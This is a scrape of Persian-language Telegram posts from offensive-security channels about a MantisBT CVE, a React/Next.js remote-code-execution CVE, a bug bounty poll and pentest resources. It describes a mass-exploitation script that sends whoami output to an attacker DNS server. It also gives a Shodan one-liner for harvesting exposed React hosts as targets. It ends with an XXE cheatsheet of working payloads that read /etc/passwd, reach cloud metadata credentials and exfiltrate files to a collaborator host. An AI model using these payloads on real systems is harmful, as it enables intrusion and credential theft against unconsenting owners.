CVE-2025-47776 - 1day, MantisBT vulnerable to authentication bypass for some passwords due to PHP type juggling
#Pruva today reproduction and exploit.
Exploit
⭐️ @RadvanSec
#Pruva today reproduction and exploit.
Exploit
⭐️ @RadvanSec
❤4👍2🔥1👏1
Sin0x001
Web Application Security-Persian.pdf
کتاب web application رو گفتید بزارم ترجمش رو یکی از بچه ها زحمت کشیده کانالشون :
@web_articles
@web_articles
👍4❤2
40 Methods for Privilege Escalation Linux-Windows-macOS.pdf
84.9 MB
40 Methods Of Privilege Escalation of Linux, Windows and Mac
۴۰ روش افزایش سطح دسترسی در لینوکس، ویندوز و مک
⭐️ @RadvanSec
۴۰ روش افزایش سطح دسترسی در لینوکس، ویندوز و مک
⭐️ @RadvanSec
❤6👍2
بچه هایی که باگ بانتی کار میکنید رفلکشن روی js فایل ها براتون اهمیت داره یا خیلی ساده ازش رد میشید؟!
بگین یه tip کلاینت ساید بهتون بگم
بگین یه tip کلاینت ساید بهتون بگم
Anonymous Poll
36%
اهمیتی نداره برام چون کانتنت صفحه html نیست
64%
اهمیت داره و سعی میکنم اکسپلویت کنم
❤3🔥1
RadvanSec
بچه هایی که باگ بانتی کار میکنید رفلکشن روی js فایل ها براتون اهمیت داره یا خیلی ساده ازش رد میشید؟!
بگین یه tip کلاینت ساید بهتون بگم
بگین یه tip کلاینت ساید بهتون بگم
اکسپلویت رو داخل دایرکت کانال بگین
🔥3
https://slcyber.io/research-center/high-fidelity-detection-mechanism-for-rsc-next-js-rce-cve-2025-55182-cve-2025-66478/
@radvansec
@radvansec
Searchlight Cyber
High Fidelity Detection Mechanism for RSC/Next.js RCE (CVE-2025-55182 & CVE-2025-66478) › Searchlight Cyber
This morning, an advisory was released for Next.js about a vulnerability that leads to RCE in default configurations, with no prerequisites. The root cause of this issue lies in React Server Components, which Next.js utilizes. Over the last day, we have noticed…
❤6
reza
Voice message
چند نفر از بچه ها گفته بودن چرا کاری که همه انجام میدن رو ماهم باید انجام بدیم عملا این طرز فکر که شما کاری رو انجام بدی که بقیه حتی به فکرشون هم خطور نمیکنه کاملا ایده ی نیچ ای هست و بسیار عالیه و سر این اصلا بحثی نداریم👌
ولی این دلیل نمیشه ما یک کار ثابت که خیلیا شاید ازش نتیجه میگیرن رو نادید بگیریم و انجام ندیم مثلا الان CVE جدیدی که اومده اگر بدونید روی تارگت هایی که دارین ران کنید صد تا هانتر دیگه هم انجام میدن و احتمال داره duplicate بشه گزارشتون, بازم شما باید اون کارو انجام بدید حدااقلش اینه یک کار مثبت انجام دادید و شاید راه های بهتری براتون باز شد.
و در کل از چیزی نترسید اگر چیزی رو خدا روزیتون قرار بده نصیبتون میشه و کسی نمیتونه جلوشو بگیره و اینکه سعی کنید هر روز رشد کنید حتی اندک 🌹🙏
ولی این دلیل نمیشه ما یک کار ثابت که خیلیا شاید ازش نتیجه میگیرن رو نادید بگیریم و انجام ندیم مثلا الان CVE جدیدی که اومده اگر بدونید روی تارگت هایی که دارین ران کنید صد تا هانتر دیگه هم انجام میدن و احتمال داره duplicate بشه گزارشتون, بازم شما باید اون کارو انجام بدید حدااقلش اینه یک کار مثبت انجام دادید و شاید راه های بهتری براتون باز شد.
و در کل از چیزی نترسید اگر چیزی رو خدا روزیتون قرار بده نصیبتون میشه و کسی نمیتونه جلوشو بگیره و اینکه سعی کنید هر روز رشد کنید حتی اندک 🌹🙏
❤8👏1👌1
Forwarded from PentesterLand Academy - Public
react-cve-03.py
2.6 KB
به دلیل اشتباهات زیادی که در اکسپلویت مربوط به CVE-2025-55182
یه کد پایتون ساده مولتی ترد اماده کردم که به راحتی خروجی whoami رو میفرسته به سرور مهاجم
فقط هم این سه تا کتابخونه ایمورت شده که دوتاش برا درخواست و عدم نشون دادن خطاست (ریکویست و یو ار ال لیب) و ترد برا سرعت بالا
ادرس دی ان اس تون رو بدید (برپ کولب یا وب هوک دی ان اس هم اوکیه)
لیست تارگت ها
خروجی whoami میاد برا دی ان اگه اسیب پذیر باشه
درصد جواب دهی ؟ 100% تست شده روی بیش از n ادرس ازمایشگاهی (لابراتوار بوده : D )
تمامی این کد صرفا جهت موارد اموزشی و هکر قانون مند نوشته شده و انجام هرگونه عملیات مخرب روی ادرس هایی که مجوز ندارید خلاف قوانین و نیت این ابزار هست
نکته :ترکیبش کنید با api shodan ببینید چی میده
یه کد پایتون ساده مولتی ترد اماده کردم که به راحتی خروجی whoami رو میفرسته به سرور مهاجم
فقط هم این سه تا کتابخونه ایمورت شده که دوتاش برا درخواست و عدم نشون دادن خطاست (ریکویست و یو ار ال لیب) و ترد برا سرعت بالا
ادرس دی ان اس تون رو بدید (برپ کولب یا وب هوک دی ان اس هم اوکیه)
لیست تارگت ها
خروجی whoami میاد برا دی ان اگه اسیب پذیر باشه
درصد جواب دهی ؟ 100% تست شده روی بیش از n ادرس ازمایشگاهی (لابراتوار بوده : D )
تمامی این کد صرفا جهت موارد اموزشی و هکر قانون مند نوشته شده و انجام هرگونه عملیات مخرب روی ادرس هایی که مجوز ندارید خلاف قوانین و نیت این ابزار هست
نکته :ترکیبش کنید با api shodan ببینید چی میده
❤5
Forwarded from PentesterLand Academy - Public
Shodan cli command 😁️️
shodan search --fields ip_str,port --limit 1000 'http.component:"react"' | awk '{print "https://"$1":"$2}' > test.txt
باز هم برای مصارف اموزشی این رو فقط رو ای پی هایی که اجازه دارید بزنید
قانون مند باشید
shodan search --fields ip_str,port --limit 1000 'http.component:"react"' | awk '{print "https://"$1":"$2}' > test.txt
باز هم برای مصارف اموزشی این رو فقط رو ای پی هایی که اجازه دارید بزنید
قانون مند باشید
❤5
Forwarded from PentesterLand Academy - Public
این پست توضیحات اسیب پذیری ترسناک و جدیدی هست که روی React o nextjs یا دقیق تر بگم RSC اومده، و منجر به دسترسی به سرور میشه و خلاصه مهاجم میتونه بیاد تو(و همه چیز از تو اومدن شروع میشه)😁:
https://www.instagram.com/reel/DR37lC-jSZs/?igsh=MWg4MWplN2o0bXhrNw==
خیلی دوست دارم اون روزی بیاد که پستا تخصصی بیشتر محتوا زرد و طنز دیده بشه 😁❤️🔥
https://www.instagram.com/reel/DR37lC-jSZs/?igsh=MWg4MWplN2o0bXhrNw==
خیلی دوست دارم اون روزی بیاد که پستا تخصصی بیشتر محتوا زرد و طنز دیده بشه 😁❤️🔥
Instagram
@pentesterland
هشدار فوری به دوستانی که از nextjs یا react استفاده میکنند
اگه سریعا اقدام نکنید به واسطه اسیب پذیری که روی RSC بخش Flight deserialization رخ داده از سرور شما دسترسی خواهد گرفت و مهاجمین اینکار را به سادگی انجام خواهند داد
اگه میخوای به کد بررسی…
هشدار فوری به دوستانی که از nextjs یا react استفاده میکنند
اگه سریعا اقدام نکنید به واسطه اسیب پذیری که روی RSC بخش Flight deserialization رخ داده از سرور شما دسترسی خواهد گرفت و مهاجمین اینکار را به سادگی انجام خواهند داد
اگه میخوای به کد بررسی…
❤6
XXE Cheatsheet
using external entities:
perform SSRF attacks:
Blind XXE with out-of-band interaction:
Blind XXE with out-of-band interaction via XML parameter entities:
blind XXE to exfiltrate data using a malicious external DTD:
DTD file:
blind XXE to retrieve data via error messages:
DTD file:
XInclude to retrieve files:
XXE via image file upload:
XXE inside SOAP body:
XXE: Base64 Encoded:
XXE inside SVG:
⭐️ @RadvanSec
using external entities:
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
perform SSRF attacks:
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/admin"> ]>
Blind XXE with out-of-band interaction:
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "http://burp-collab"> ]>
Blind XXE with out-of-band interaction via XML parameter entities:
<!DOCTYPE stockCheck [<!ENTITY % xxe SYSTEM "http://burp-collaborator> %xxe; ]>
blind XXE to exfiltrate data using a malicious external DTD:
DTD file:
<!ENTITY % eval "<!ENTITY % test SYSTEM 'http://burp-collaborator/?a=%file;'>">
%eval;
%test;XXE Payload:
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "YOUR-DTD-URL"> %xxe;]>
blind XXE to retrieve data via error messages:
DTD file:
<!ENTITY % notvalid "<!ENTITY % test SYSTEM 'file:///invalid/%file;'>">
%notvalid;
%test;XXE Payload:
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "YOUR-DTD-URL"> %xxe;]>
XInclude to retrieve files:
<foo xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/passwd"/></foo>
XXE via image file upload:
<?xml version="1.0" standalone="yes"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]><noscript width="128px" height="128px" xmlns="http://www.w3.org/2000/noscript" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text font-size="16" x="0" y="16">&xxe;</text></noscript>
XXE inside SOAP body:
<soap:Body><foo><![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://x.x.x.x:22/"> %dtd;]><xxx/>]]></foo></soap:Body>
XXE: Base64 Encoded:
<!DOCTYPE test [ <!ENTITY % init SYSTEM "data://text/plain;base64,ZmlsZTovLy9ldGMvcGFzc3dk"> %init; ]><foo/>
XXE inside SVG:
<noscript xmlns="http://www.w3.org/2000/noscript" xmlns:xlink
<image xlink:href="expect://ls"></image>
</noscript>
⭐️ @RadvanSec
❤4👍2